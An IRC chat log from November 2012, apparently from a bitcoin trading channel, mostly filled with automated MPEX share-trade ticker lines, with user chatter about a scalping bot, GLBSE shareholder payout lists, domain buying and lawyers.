18:46:39 so you'd need a client that spoke both bitcoin and exchangecoin Nov 24 18:46:46 Diablo-D3: this is one more point if failure? Nov 24 18:46:53 of* Nov 24 18:46:57 no Nov 24 18:55:44 in the end, remarkable how low reputations lawyers enjoy with the general public, and how little consideration or indeed knowledge the latter has about legal process. Nov 24 18:55:55 it's almost as if the western world is made of no citizens. Nov 24 18:59:03 [MPEX] [S.MPOE] 44615 @ 0.00050062 = 22.3352 BTC [-] Nov 24 19:01:49 mircea_popescu: lawyers are the scumbags who have made sure no normal person can survive the fkn traps they have woven. What a "wonderful" system to make sure the big Co's get what they want and common people get fucked left ans right. Nov 24 19:02:13 you do not understand it because you do not see the big picture, mircea_popescu Nov 24 19:03:25 maybe you see it but your obsession with money has blinded you so you do not understand it what you see. Nov 24 19:07:56 [MPEX] [S.MPOE] 21335 @ 0.00050062 = 10.6807 BTC [-] Nov 24 19:07:58 [MPEX] [S.MPOE] 20900 @ 0.00050194 = 10.4905 BTC [+] Nov 24 19:07:59 [MPEX] [S.MPOE] 3154 @ 0.00051429 = 1.6221 BTC [+] Nov 24 19:11:48 [MPEX] [S.MPOE] 5086 @ 0.00050025 = 2.5443 BTC [-] Nov 24 19:11:49 [MPEX] [S.MPOE] 18700 @ 0.00050021 = 9.3539 BTC [-] Nov 24 19:11:51 [MPEX] [S.MPOE] 30864 @ 0.00049948 = 15.416 BTC [-] Nov 24 19:12:57 or maybe i am one of those for whom lawyers usually work. Nov 24 19:14:31 [MPEX] [S.MPOE] 3450 @ 0.00051429 = 1.7743 BTC [+] Nov 24 19:15:24 [MPEX] [S.MPOE] 16610 @ 0.00049948 = 8.2964 BTC [-] Nov 24 19:15:26 [MPEX] [S.MPOE] 7250 @ 0.00049916 = 3.6189 BTC [-] Nov 24 19:15:27 [MPEX] [S.MPOE] 4413 @ 0.00049904 = 2.2023 BTC [-] Nov 24 19:16:37 [MPEX] [S.MPOE] 12280 @ 0.00051429 = 6.3155 BTC [+] Nov 24 19:16:39 [MPEX] [S.MPOE] 3215 @ 0.00051498 = 1.6557 BTC [+] Nov 24 19:16:40 [MPEX] [S.MPOE] 1000 @ 0.0005162 = 0.5162 BTC [+] Nov 24 19:16:41 [MPEX] [S.MPOE] 43700 @ 0.00051621 = 22.5584 BTC [+] Nov 24 19:19:06 [MPEX] [S.MPOE] 18400 @ 0.00051623 = 9.4986 BTC [+] Nov 24 19:23:16 [MPEX] [S.MPOE] 1000 @ 0.00051644 = 0.5164 BTC [+] Nov 24 19:23:17 [MPEX] [S.MPOE] 24134 @ 0.00051645 = 12.464 BTC [+] Nov 24 19:24:29 [MPEX] [S.MPOE] 13800 @ 0.00051645 = 7.127 BTC [+] Nov 24 19:24:38 here is one from last week with BTC logo http://i46.tinypic.com/35i9agi.jpg it has a rough texture and handle looks like it has some rust on it (it's a high fire glaze, so will not stain) Nov 24 19:25:39 this is called stoneware (high temperature fire) Nov 24 19:26:01 I have more pictures from different angle Nov 24 19:26:42 [MPEX] [S.MPOE] 9160 @ 0.00051623 = 4.7287 BTC [-] Nov 24 19:34:30 ;;ident PsychoticBoy Nov 24 19:34:30 Nick 'PsychoticBoy', with hostmask 'PsychoticBoy!~Psychotic@pdpc/supporter/active/psychoticboy', is identified as user PsychoticBoy, with GPG key id 06DC71AFE4DAC520, key fingerprint 9E476C16F877E988110787BC06DC71AFE4DAC520, and bitcoin address None Nov 24 19:35:03 [MPEX] [S.MPOE] 23748 @ 0.00050395 = 11.9678 BTC [-] Nov 24 19:38:24 [MPEX] [S.MPOE] 15362 @ 0.00049904 = 7.6663 BTC [-] Nov 24 19:38:25 [MPEX] [S.MPOE] 21150 @ 0.00049903 = 10.5545 BTC [-] Nov 24 19:38:26 [MPEX] [S.MPOE] 19488 @ 0.00049887 = 9.722 BTC [-] Nov 24 19:41:43 [MPEX] [S.MPOE] 15492 @ 0.00050395 = 7.8072 BTC [+] Nov 24 19:41:44 [MPEX] [S.MPOE] 3900 @ 0.00050398 = 1.9655 BTC [+] Nov 24 19:49:46 [MPEX] [S.MPOE] 24400 @ 0.00050379 = 12.2925 BTC [-] Nov 24 19:52:49 [MPEX] [S.MPOE] 7988 @ 0.00050379 = 4.0243 BTC [-] Nov 24 19:52:51 [MPEX] [S.MPOE] 9462 @ 0.00050398 = 4.7687 BTC [+] Nov 24 19:57:14 [MPEX] [S.MPOE] 20188 @ 0.00050398 = 10.1743 BTC [+] Nov 24 19:57:16 [MPEX] [S.MPOE] 4208 @ 0.00051004 = 2.1462 BTC [+] Nov 24 20:00:52 https://www.bitcoin.de/en?cr=1 lol anyone feel bravely about arbitrage ? Nov 24 20:07:37 someone already did Nov 24 20:10:54 no ? i still see 20 eur/btc Nov 24 20:16:02 [MPEX] [S.MPOE] 45550 @ 0.00051004 = 23.2323 BTC [+] Nov 24 20:19:27 mircea, look to the orders table, not to graph Nov 24 20:20:02 oh i see Nov 24 20:20:08 and latest trades in the bottom too Nov 24 20:21:07 [MPEX] [S.MPOE] 21692 @ 0.00051004 = 11.0638 BTC [+] Nov 24 20:25:36 [MPEX] [S.MPOE] 17059 @ 0.00051495 = 8.7845 BTC [+] Nov 24 20:31:06 [MPEX] [S.MPOE] 2753 @ 0.00051495 = 1.4177 BTC [+] Nov 24 20:31:07 [MPEX] [S.MPOE] 9638 @ 0.00050804 = 4.8965 BTC [-] Nov 24 20:33:48 [MPEX] [S.MPOE] 15300 @ 0.00050365 = 7.7058 BTC [-] Nov 24 20:36:15 [MPEX] [S.MPOE] 9700 @ 0.00050365 = 4.8854 BTC [-] Nov 24 20:36:17 [MPEX] [S.MPOE] 20032 @ 0.00049887 = 9.9934 BTC [-] Nov 24 20:38:38 well... need a powerful sales type for a joint venture Nov 24 20:38:43 anyone want to step forward ? Nov 24 20:39:23 [MPEX] [S.MPOE] 34302 @ 0.00050578 = 17.3493 BTC [+] Nov 24 20:58:30 [MPEX] [S.MPOE] 33100 @ 0.00051054 = 16.8989 BTC [+] Nov 24 21:10:22 [MPEX] [S.MPOE] 11950 @ 0.00051054 = 6.101 BTC [+] Nov 24 21:18:28 [MPEX] [S.MPOE] 22350 @ 0.00051232 = 11.4504 BTC [+] Nov 24 21:22:12 [MPEX] [S.MPOE] 9000 @ 0.00051141 = 4.6027 BTC [-] Nov 24 21:22:13 [MPEX] [S.MPOE] 9298 @ 0.00050903 = 4.733 BTC [-] Nov 24 21:22:15 [MPEX] [S.MPOE] 7152 @ 0.00050303 = 3.5977 BTC [-] Nov 24 21:27:56 Reward-Drop ETA: 2012-11-28 22:17:49 UTC (4 days, 2 hours, 50 minutes) Nov 24 21:28:00 an era ends. Nov 24 21:28:16 and a new begins Nov 24 21:28:36 indeed. Nov 24 21:30:03 [MPEX] [S.DICE] 3395 @ 0.00316381 = 10.7411 BTC [-] Nov 24 21:33:43 [MPEX] [S.MPOE] 13456 @ 0.00050303 = 6.7688 BTC [-] Nov 24 21:33:44 [MPEX] [S.MPOE] 3744 @ 0.00050259 = 1.8817 BTC [-] Nov 24 21:36:19 apparently badbear is saying gigavps should get scammer tag ? Nov 24 21:36:26 https://bitcointalk.org/index.php?topic=127488.msg1354888#msg1354888 Nov 24 21:38:26 [MPEX] [S.MPOE] 10600 @ 0.00051232 = 5.4306 BTC [+] Nov 24 21:41:02 [MPEX] [S.MPOE] 1000 @ 0.00051644 = 0.5164 BTC [+] Nov 24 21:41:04 [MPEX] [S.MPOE] 32724 @ 0.00051645 = 16.9003 BTC [+] Nov 24 21:44:39 [MPEX] [S.MPOE] 2214 @ 0.00051645 = 1.1434 BTC [+] Nov 24 21:44:41 [MPEX] [S.MPOE] 15350 @ 0.00051671 = 7.9315 BTC [+] Nov 24 21:44:42 [MPEX] [S.MPOE] 19836 @ 0.00051686 = 10.2524 BTC [+] Nov 24 21:46:09 Ah yes... well I suppose someone making an agreement he cannot honor afterward (for whichever reasons, even if forced not to honor it) could be considered as a scam, somehow... Nov 24 21:47:06 common mistake! Nov 24 21:49:26 [MPEX] [S.MPOE] 18964 @ 0.00051686 = 9.8017 BTC [+] Nov 24 21:49:28 [MPEX] [S.MPOE] 3836 @ 0.00051693 = 1.9829 BTC [+] Nov 24 21:53:00 [MPEX] [S.MPOE] 19000 @ 0.00051397 = 9.7654 BTC [-] Nov 24 21:53:50 NO! Nov 24 21:54:20 I know who you're referring to... Nov 24 21:55:33 I argued a bit too much maybe. Nov 24 21:56:04 As someone posted recently somewhere on OTC I think: http://innerslacker.com/images/argue091204.jpg Nov 24 21:58:45 yes indeed, much better to argue irl. Nov 24 22:02:01 Well does it really make a difference? Other than persons are more careful of what they say when they can be seen... Nov 24 22:02:20 Eh, either way, I'm off for bit. Nov 24 22:06:02 [MPEX] [S.MPOE] 6400 @ 0.00051693 = 3.3084 BTC [+] Nov 24 22:14:41 [MPEX] [S.MPOE] 1000 @ 0.00051692 = 0.5169 BTC [-] Nov 24 22:14:42 [MPEX] [S.MPOE] 17914 @ 0.00051693 = 9.2603 BTC [+] Nov 24 22:14:44 [MPEX] [S.MPOE] 13850 @ 0.00051696 = 7.1599 BTC [+] Nov 24 22:14:45 [MPEX] [S.MPOE] 52200 @ 0.000517 = 26.9874 BTC [+] Nov 24 22:14:46 [MPEX] [S.MPOE] 27992 @ 0.00051712 = 14.4752 BTC [+] Nov 24 22:24:47 [MPEX] [S.MPOE] 1900 @ 0.00051397 = 0.9765 BTC [-] Nov 24 22:24:48 [MPEX] [S.MPOE] 27800 @ 0.00051273 = 14.2539 BTC [-] Nov 24 22:28:02 [MPEX] [S.MPOE] 40050 @ 0.00050927 = 20.3963 BTC [-] Nov 24 22:39:20 [MPEX] [S.MPOE] 2050 @ 0.00050927 = 1.044 BTC [-] Nov 24 22:39:20 [MPEX] [S.MPOE] 9106 @ 0.00050259 = 4.5766 BTC [-] Nov 24 22:39:22 [MPEX] [S.MPOE] 3344 @ 0.00050171 = 1.6777 BTC [-] Nov 24 22:47:15 bah. Nov 24 22:47:42 random owners of random abandoned/burried websites need to learn that if anyone asks "how much for the site" bs replies a la "we're open to offers" do not work. Nov 24 22:47:57 there's fifty million just like them. there's maybe five people in the market. maybe. Nov 24 22:53:11 ;;ticker Nov 24 22:53:12 BTCUSD ticker | Best bid: 12.44999, Best ask: 12.45000, Bid-ask spread: 0.00001, Last trade: 12.44999, 24 hour volume: 22381.31642394, 24 hour low: 12.25000, 24 hour high: 12.45000, 24 hour vwap: 12.35589 Nov 24 22:56:56 [MPEX] [S.MPOE] 2400 @ 0.00050946 = 1.2227 BTC [+] Nov 24 22:56:58 [MPEX] [S.MPOE] 8022 @ 0.00051204 = 4.1076 BTC [+] Nov 24 23:07:41 [MPEX] [S.MPOE] 10422 @ 0.00050744 = 5.2885 BTC [-] Nov 24 23:11:15 [15:47] random owners of random abandoned/burried websites need to learn that if anyone asks "how much for the site" bs replies a la "we're open to offers" do not work. Nov 24 23:11:42 No, they wait for that 500 000$ offer. They're still in the dotcom bubble. Nov 24 23:12:12 awell. Nov 24 23:12:36 Basically, as soon as you inquire about a domain/website, be sure to receive a "feel free to offer" or a 50x inflated price. Nov 24 23:13:02 They'll try to milk you if they know you want it. Nov 24 23:13:23 If you're not offering top dollars, they'll wait for the next person to come around. Nov 24 23:13:36 Anyway, off for a bit again. Nov 24 23:14:18 [MPEX] [S.MPOE] 13428 @ 0.00050744 = 6.8139 BTC [-] Nov 24 23:14:20 [MPEX] [S.MPOE] 5199 @ 0.00050171 = 2.6084 BTC [-] Nov 24 23:15:34 [MPEX] [S.MPOE] 2345 @ 0.00050529 = 1.1849 BTC [+] Nov 24 23:19:54 scaring the markets after several months hiatus :P Nov 24 23:20:29 what's it do ? Nov 24 23:21:58 it's that scalper Nov 24 23:23:08 does it work ? Nov 24 23:24:11 we'll see... made a buy and now it's complaining about actual price Nov 24 23:24:31 [MPEX] [S.MPOE] 24200 @ 0.00050263 = 12.1636 BTC [-] Nov 24 23:24:33 waiting for the gap to open Nov 24 23:25:58 lol a complaining bot Nov 24 23:26:38 yeah, my code is bitchy.. like me xD Nov 24 23:27:01 WARNI [__main__] Price 49307 is below last buy price 50529 Nov 24 23:27:29 [MPEX] [S.MPOE] 755 @ 0.00050263 = 0.3795 BTC [-] Nov 24 23:27:31 [MPEX] [S.MPOE] 7900 @ 0.00051145 = 4.0405 BTC [+] Nov 24 23:27:32 [MPEX] [S.MPOE] 26745 @ 0.00051204 = 13.6945 BTC [+] Nov 24 23:27:47 INFO [mpex.stat] new order:S S.MPOE, amount: 2345, price: 50495 Nov 24 23:27:50 fuck yeah Nov 24 23:28:20 lol Nov 24 23:28:24 [MPEX] [S.MPOE] 42400 @ 0.00050171 = 21.2725 BTC [-] Nov 24 23:28:45 wait. it sold for a loss ? Nov 24 23:29:14 i allow for few satoshi loss Nov 24 23:29:22 ah Nov 24 23:34:25 [MPEX] [S.MPOE] 30429 @ 0.00050171 = 15.2665 BTC [-] Nov 24 23:34:25 [MPEX] [S.MPOE] 22852 @ 0.00050119 = 11.4532 BTC [-] Nov 24 23:34:52 Namjies: did nefario not include his little custom identification "codes"/tokens per share holder in the yaml file he sent out? just email/payment_address/shares ? Nov 24 23:35:12 or anyone else know? Nov 24 23:36:02 no shareholder info here yet for the two things i expect to get it for Nov 24 23:36:53 [MPEX] [S.DICE] 1629 @ 0.00316381 = 5.1538 BTC [-] Nov 24 23:36:55 [MPEX] [S.DICE] 4121 @ 0.00308319 = 12.7058 BTC [-] Nov 24 23:37:07 it's tanking :o Nov 24 23:37:16 heh Nov 24 23:41:29 http://blog.smickles.com/bitcoin/bitcoin-finance/a-good-month-for-s-dice-shareholders-in-the-making/#update_24nov12 Nov 24 23:41:37 number updated to 1.146959% Nov 24 23:41:44 mircea_popescu: & Nov 24 23:43:30 ukto indeed not. Nov 24 23:43:41 mircea_popescu: interesting. Nov 24 23:43:59 [MPEX] [S.MPOE] 2345 @ 0.00050495 = 1.1841 BTC [+] Nov 24 23:44:00 i guess he didn't have time Nov 24 23:44:01 [MPEX] [S.MPOE] 17933 @ 0.00051204 = 9.1824 BTC [+] Nov 24 23:44:02 [MPEX] [S.MPOE] 10620 @ 0.00051438 = 5.4627 BTC [+] Nov 24 23:44:03 [MPEX] [S.MPOE] 46499 @ 0.00051508 = 23.9507 BTC [+] Nov 24 23:44:03 [MPEX] [S.MPOE] 1000 @ 0.00051711 = 0.5171 BTC [+] Nov 24 23:44:04 [MPEX] [S.MPOE] 56508 @ 0.00051712 = 29.2214 BTC [+] Nov 24 23:44:05 [MPEX] [S.MPOE] 31450 @ 0.00051733 = 16.27 BTC [+] Nov 24 23:44:06 [MPEX] [S.MPOE] 56700 @ 0.00051741 = 29.3371 BTC [+] Nov 24 23:44:07 [MPEX] [S.MPOE] 1000 @ 0.00051745 = 0.5175 BTC [+] Nov 24 23:44:08 [MPEX] [S.MPOE] 101966 @ 0.00051746 = 52.7633 BTC [+] Nov 24 23:44:10 [MPEX] [S.MPOE] 34100 @ 0.00051751 = 17.6471 BTC [+] Nov 24 23:44:11 [MPEX] [S.MPOE] 48850 @ 0.00051759 = 25.2843 BTC [+] Nov 24 23:44:12 [MPEX] [S.MPOE] 31580 @ 0.00051768 = 16.3483 BTC [+] Nov 24 23:44:12 [MPEX] [S.MPOE] 41499 @ 0.00051772 = 21.4849 BTC [+] Nov 24 23:44:13 [MPEX] [S.MPOE] 24359 @ 0.00051785 = 12.6143 BTC [+] Nov 24 23:44:14 [MPEX] [S.MPOE] 34992 @ 0.00051788 = 18.1217 BTC [+] Nov 24 23:44:15 [MPEX] [S.MPOE] 22300 @ 0.00051816 = 11.555 BTC [+] Nov 24 23:44:16 [MPEX] [S.MPOE] 82904 @ 0.00051848 = 42.9841 BTC [+] Nov 24 23:44:17 [MPEX] [S.MPOE] 13242 @ 0.00051853 = 6.8664 BTC [+] Nov 24 23:44:18 [MPEX] [S.MPOE] 27415 @ 0.00051857 = 14.2166 BTC [+] Nov 24 23:44:19 [MPEX] [S.MPOE] 33800 @ 0.00051858 = 17.528 BTC [+] Nov 24 23:44:20 [MPEX] [S.MPOE] 74842 @ 0.00051861 = 38.8138 BTC [+] Nov 24 23:44:21 [MPEX] [S.MPOE] 16600 @ 0.00051874 = 8.6111 BTC [+] Nov 24 23:44:22 [MPEX] [S.MPOE] 11000 @ 0.00051875 = 5.7063 BTC [+] Nov 24 23:44:23 [MPEX] [S.MPOE] 37550 @ 0.00051876 = 19.4794 BTC [+] Nov 24 23:44:24 [MPEX] [S.MPOE] 33150 @ 0.00051876 = 17.1969 BTC [+] Nov 24 23:44:25 [MPEX] [S.MPOE] 22666 @ 0.00051882 = 11.7596 BTC [+] Nov 24 23:44:26 [MPEX] [S.MPOE] 29790 @ 0.00051889 = 15.4577 BTC [+] Nov 24 23:44:27 [MPEX] [S.MPOE] 32600 @ 0.00051907 = 16.9217 BTC [+] Nov 24 23:44:28 [MPEX] [S.MPOE] 42900 @ 0.00051908 = 22.2685 BTC [+] Nov 24 23:44:29 [MPEX] [S.MPOE] 27400 @ 0.00051929 = 14.2285 BTC [+] Nov 24 23:44:30 [MPEX] [S.MPOE] 34900 @ 0.00051938 = 18.1264 BTC [+] Nov 24 23:44:30 [MPEX] [S.MPOE] 30900 @ 0.00051964 = 16.0569 BTC [+] Nov 24 23:44:31 0,o Nov 24 23:44:31 [MPEX] [S.MPOE] 18850 @ 0.00051966 = 9.7956 BTC [+] Nov 24 23:44:32 [MPEX] [S.MPOE] 7100 @ 0.00051976 = 3.6903 BTC [+] Nov 24 23:44:33 [MPEX] [S.MPOE] 14950 @ 0.00051978 = 7.7707 BTC [+] Nov 24 23:44:34 [MPEX] [S.MPOE] 32750 @ 0.00052022 = 17.0372 BTC [+] Nov 24 23:44:35 [MPEX] [S.MPOE] 41450 @ 0.00052025 = 21.5644 BTC [+] Nov 24 23:44:36 [MPEX] [S.MPOE] 22900 @ 0.00052033 = 11.9156 BTC [+] Nov 24 23:44:37 [MPEX] [S.MPOE] 57000 @ 0.0005205 = 29.6685 BTC [+] Nov 24 23:44:38 [MPEX] [S.MPOE] 7148 @ 0.00052059 = 3.7212 BTC [+] Nov 24 23:44:39 [MPEX] [S.MPOE] 11400 @ 0.00052063 = 5.9352 BTC [+] Nov 24 23:44:40 [MPEX] [S.MPOE] 17043 @ 0.00052066 = 8.8736 BTC [+] Nov 24 23:44:41 [MPEX] [S.MPOE] 28700 @ 0.00052067 = 14.9432 BTC [+] Nov 24 23:44:42 [MPEX] [S.MPOE] 13000 @ 0.00052077 = 6.77 BTC [+] Nov 24 23:44:43 [MPEX] [S.MPOE] 38700 @ 0.00052078 = 20.1542 BTC [+] Nov 24 23:44:44 :o Nov 24 23:44:44 [MPEX] [S.MPOE] 25300 @ 0.00052082 = 13.1767 BTC [+] Nov 24 23:44:45 [MPEX] [S.MPOE] 41600 @ 0.00052087 = 21.6682 BTC [+] Nov 24 23:44:46 [MPEX] [S.MPOE] 15750 @ 0.000521 = 8.2058 BTC [+] Nov 24 23:44:47 [MPEX] [S.MPOE] 27400 @ 0.00052107 = 14.2773 BTC [+] Nov 24 23:44:48 [MPEX] [S.MPOE] 24715 @ 0.00052116 = 12.8805 BTC [+] Nov 24 23:44:49 [MPEX] [S.MPOE] 34000 @ 0.00052122 = 17.7215 BTC [+] Nov 24 23:44:50 [MPEX] [S.MPOE] 39548 @ 0.00052128 = 20.6156 BTC [+] Nov 24 23:44:50 lol this looks cool on live.coinbr.com Nov 24 23:44:51 [MPEX] [S.MPOE] 36000 @ 0.00052144 = 18.7718 BTC [+] Nov 24 23:44:52 [MPEX] [S.MPOE] 29850 @ 0.00052165 = 15.5713 BTC [+] Nov 24 23:44:53 [MPEX] [S.MPOE] 32557 @ 0.00052177 = 16.9873 BTC [+] Nov 24 23:44:54 [MPEX] [S.MPOE] 50450 @ 0.00052186 = 26.3278 BTC [+] Nov 24 23:44:55 [MPEX] [S.MPOE] 97366 @ 0.00052197 = 50.8221 BTC [+] Nov 24 23:44:56 [MPEX] [S.MPOE] 45350 @ 0.00052203 = 23.6741 BTC [+] Nov 24 23:44:56 smickles: See what you did? Nov 24 23:44:57 [MPEX] [S.MPOE] 30700 @ 0.00052205 = 16.0269 BTC [+] Nov 24 23:44:58 [MPEX] [S.MPOE] 9700 @ 0.0005221 = 5.0644 BTC [+] Nov 24 23:44:59 [MPEX] [S.MPOE] 26315 @ 0.00052213 = 13.7399 BTC [+] Nov 24 23:45:00 [MPEX] [S.MPOE] 25225 @ 0.00052214 = 13.171 BTC [+] Nov 24 23:45:01 [MPEX] [S.MPOE] 31788 @ 0.00052217 = 16.5987 BTC [+] Nov 24 23:45:02 [MPEX] [S.MPOE] 14950 @ 0.00052245 = 7.8106 BTC [+] Nov 24 23:45:03 [MPEX] [S.MPOE] 13127 @ 0.00052249 = 6.8587 BTC [+] Nov 24 23:45:04 [MPEX] [S.MPOE] 48650 @ 0.00052286 = 25.4371 BTC [+] Nov 24 23:45:05 [MPEX] [S.MPOE] 30106 @ 0.00052287 = 15.7415 BTC [+] Nov 24 23:45:06 [MPEX] [S.MPOE] 36500 @ 0.00052298 = 19.0888 BTC [+] Nov 24 23:45:07 [MPEX] [S.MPOE] 35700 @ 0.00052298 = 18.6704 BTC [+] Nov 24 23:45:08 [MPEX] [S.MPOE] 21361 @ 0.00052319 = 11.1759 BTC [+] Nov 24 23:45:09 [MPEX] [S.MPOE] 37700 @ 0.0005232 = 19.7246 BTC [+] Nov 24 23:45:10 [MPEX] [S.MPOE] 23800 @ 0.00052322 = 12.4526 BTC [+] Nov 24 23:45:11 [MPEX] [S.MPOE] 37694 @ 0.00052349 = 19.7324 BTC [+] Nov 24 23:45:12 [MPEX] [S.MPOE] 18300 @ 0.00052352 = 9.5804 BTC [+] Nov 24 23:45:13 [MPEX] [S.MPOE] 25795 @ 0.00052359 = 13.506 BTC [+] Nov 24 23:45:14 [MPEX] [S.MPOE] 28450 @ 0.00052362 = 14.897 BTC [+] Nov 24 23:45:15 [MPEX] [S.MPOE] 4400 @ 0.00052362 = 2.3039 BTC [+] Nov 24 23:45:16 [MPEX] [S.MPOE] 9063 @ 0.00052377 = 4.7469 BTC [+] Nov 24 23:45:17 [MPEX] [S.MPOE] 7509 @ 0.00052391 = 3.934 BTC [+] Nov 24 23:45:18 [MPEX] [S.MPOE] 30750 @ 0.00052438 = 16.1247 BTC [+] Nov 24 23:45:19 [MPEX] [S.MPOE] 45800 @ 0.00052455 = 24.0244 BTC [+] Nov 24 23:45:20 [MPEX] [S.MPOE] 29250 @ 0.00052463 = 15.3454 BTC [+] Nov 24 23:45:20 Ukto: i was talking about s.dice tho Nov 24 23:45:23 /¯(°_o)/¯ Nov 24 23:45:39 si? its still your fault. :P Nov 24 23:45:50 so* Nov 24 23:47:47 http://polimedia.us/dtng/c/src/135379365668.png saved for prosterity. Nov 24 23:48:37 buy all the mpoehttp://p4r.buzzleberry.com/?p=481 Nov 24 23:48:44 oh hey Nov 24 23:49:54 nice link. do you have a penis preocupation ? Nov 24 23:50:31 I like to draw them where I can Nov 24 23:50:34 Kato: Kurisu-san suggested we study different types of penises in order to create figure out the relative shape and size people would draw. We spent a week doing that before we realized that we should have been looking at drawings of penises rather than real-life pictures. (laughs) We were very embarrassed about that. Nov 24 23:50:39 Kurisu: My judgement on these types of situations is poor. (laughs) Nov 24 23:51:43 you have got to be a total fuckwit to even attempt "moderating" penis doodles. Nov 24 23:52:00 i have no idea what they do buyt i hope it fails miserably. Nov 24 23:59:04 lmao, looks like barebackbot impromptu found a new mpex bug indeed xD Nov 24 23:59:31 do tell ? Nov 24 23:59:37 will send email shortly Nov 25 00:11:38 false alarm :/ Nov 25 00:11:58 lol why sad ? Nov 25 00:15:34 i enjoy finding such bugs Nov 25 00:16:26 :p Nov 25 00:16:52 but it was "only" a 40sec delay Nov 25 00:17:54 [MPEX] [S.MPOE] 9840 @ 0.000525 = 5.166 BTC [+] Nov 25 00:21:33 with all these discussions maybe we'll see MPOE-PR starting penis drawing contest on btctalk Nov 25 00:22:11 lol, are you good at it ? Nov 25 00:22:39 don't know, never tried Nov 25 00:23:37 evening Nov 25 00:24:37 evening Nov 25 00:24:50 so no tag for you Nov 25 00:24:54 come back, 1 year! Nov 25 00:24:59 seems not today Nov 25 00:36:21 huh, was SR offline for two weeks ?! Nov 25 00:38:02 [MPEX] [S.MPOE] 11590 @ 0.000525 = 6.0848 BTC [+] Nov 25 00:41:47 [MPEX] [S.MPOE] 2345 @ 0.00052522 = 1.2316 BTC [+] Nov 25 00:41:49 [MPEX] [S.MPOE] 1000 @ 0.00052543 = 0.5254 BTC [+] Nov 25 00:41:50 [MPEX] [S.MPOE] 13098 @ 0.00052544 = 6.8822 BTC [+] Nov 25 00:41:51 [MPEX] [S.MPOE] 23100 @ 0.00052592 = 12.1488 BTC [+] Nov 25 00:41:53 [MPEX] [S.MPOE] 8657 @ 0.00052623 = 4.5556 BTC [+] Nov 25 00:43:19 and why has the press settled on "semi-anonymous" to describe bitcoin Nov 25 00:43:20 mircea_popescu: yeah, kinda makes you wonder why anyone thinks it's a significant part of the economy Nov 25 00:43:27 there's no such thing. btc is pseudonymous. Nov 25 00:43:44 b/c pseudo is too big of a prefix Nov 25 00:44:01 we're talkin' 'bout 'merica Nov 25 00:45:00 ima gonna start talking of pseudo tractor trailers. Nov 25 00:45:50 mircea_popescu bitcoin oz seems to have an affinity for you Nov 25 00:45:53 pseudoconductors Nov 25 00:46:01 and i did not know he was a glbse shareholder Nov 25 00:46:13 gigavps he changed his name. it's dave hollis. Nov 25 00:46:56 hmmm, i feel like he's trying to stir the pot Nov 25 00:47:08 i guess this is to be expected Nov 25 00:47:54 [MPEX] [S.MPOE] 2345 @ 0.00052564 = 1.2326 BTC [-] Nov 25 00:47:55 [MPEX] [S.MPOE] 6372 @ 0.000525 = 3.3453 BTC [-] Nov 25 00:57:18 [MPEX] [S.MPOE] 42628 @ 0.000525 = 22.3797 BTC [-] Nov 25 00:59:22 [MPEX] [S.MPOE] 2345 @ 0.0005258 = 1.233 BTC [+] Nov 25 00:59:23 [MPEX] [S.MPOE] 19205 @ 0.00052623 = 10.1062 BTC [+] Nov 25 01:09:00 [MPEX] [S.MPOE] 5638 @ 0.00052623 = 2.9669 BTC [+] Nov 25 01:09:02 [MPEX] [S.MPOE] 35112 @ 0.00052637 = 18.4819 BTC [+] Nov 25 01:16:54 [MPEX] [S.DICE] 1600 @ 0.00332909 = 5.3265 BTC [+] Nov 25 01:22:27 [MPEX] [S.MPOE] 3559 @ 0.00052637 = 1.8734 BTC [+] Nov 25 01:22:28 [MPEX] [S.MPOE] 25941 @ 0.00052637 = 13.6546 BTC [+] Nov 25 01:37:02 [MPEX] [S.MPOE] 2345 @ 0.00052546 = 1.2322 BTC [-] Nov 25 01:39:31 [MPEX] [S.MPOE] 18600 @ 0.000525 = 9.765 BTC [-] Nov 25 01:51:01 [MPEX] [S.MPOE] 7655 @ 0.00052501 = 4.019 BTC [+] Nov 25 01:51:03 [MPEX] [S.MPOE] 12810 @ 0.00052637 = 6.7428 BTC [+] Nov 25 01:54:20 [MPEX] [S.MPOE] 29600 @ 0.000525 = 15.54 BTC [-] Nov 25 02:07:14 [MPEX] [S.MPOE] 2345 @ 0.00052582 = 1.233 BTC [+] Nov 25 02:07:16 [MPEX] [S.MPOE] 4649 @ 0.00052637 = 2.4471 BTC [+] Nov 25 02:07:17 [MPEX] [S.MPOE] 16228 @ 0.00052723 = 8.5559 BTC [+] Nov 25 02:14:01 [MPEX] [S.MPOE] 39750 @ 0.00052723 = 20.9574 BTC [+] Nov 25 02:15:25 Ukto Nov 25 02:15:37 There's no token/code/anything Nov 25 02:15:48 just email+btc address+# shares Nov 25 02:17:29 Did you have any BTC-MINING shares? Nov 25 02:18:30 [MPEX] [S.MPOE] 2345 @ 0.00052554 = 1.2324 BTC [-] Nov 25 02:18:32 [MPEX] [S.MPOE] 7155 @ 0.000525 = 3.7564 BTC [-] Nov 25 02:22:38 [MPEX] [S.MPOE] 21050 @ 0.000525 = 11.0513 BTC [-] Nov 25 02:22:39 [MPEX] [S.MPOE] 35400 @ 0.0005237 = 18.539 BTC [-] Nov 25 02:22:41 [MPEX] [S.MPOE] 26900 @ 0.00052275 = 14.062 BTC [-] Nov 25 02:27:43 smickles... Nov 25 02:27:52 you had many subaccount on GLBSE right? ... Nov 25 02:28:43 [MPEX] [S.DICE] 900 @ 0.00339816 = 3.0583 BTC [+] Nov 25 02:28:45 [MPEX] [S.DICE] 600 @ 0.00332909 = 1.9975 BTC [-] Nov 25 02:31:19 mircea_popescu, I think I'm noticing a trend. Nov 25 02:31:26 [MPEX] [S.MPOE] 2345 @ 0.00052661 = 1.2349 BTC [+] Nov 25 02:31:27 [MPEX] [S.MPOE] 22760 @ 0.00052723 = 11.9998 BTC [+] Nov 25 02:31:43 which is ? Nov 25 02:32:11 It seems some who were not on the lists are issuers like me and smickles or Diablo-D3 (with subaccounts). Nov 25 02:32:30 We received 1 payment for the balance of each payment account... so multiple payments... Nov 25 02:32:45 yeah Nov 25 02:32:48 but Ive gotten paid out on all three accounts Nov 25 02:32:54 When Nefario generated the lists, he probably excluded those who received more than one payment. Nov 25 02:33:04 er all four Nov 25 02:33:26 diablo, diablo:dmc, diablo:bflsuccess, diablo:bflfail Nov 25 02:33:32 Which didn't include pretty much anyone with subaccounts, not just people who received double payments. Nov 25 02:34:13 That could explain the screw up. The only asset list I know I'm included on is my own lists. Nov 25 02:35:07 Technically, I can't make the difference between shares owned in each account. They're aggregated as one in my list. Nov 25 02:35:32 oh Nov 25 02:35:33 problem is, I was never double paid Nov 25 02:35:40 so he... fucked up the unfucking up of the multipay fuckup ? Nov 25 02:35:45 and even if I was, wouldnt nefario have emailed me? Nov 25 02:35:54 No, but you received multiple 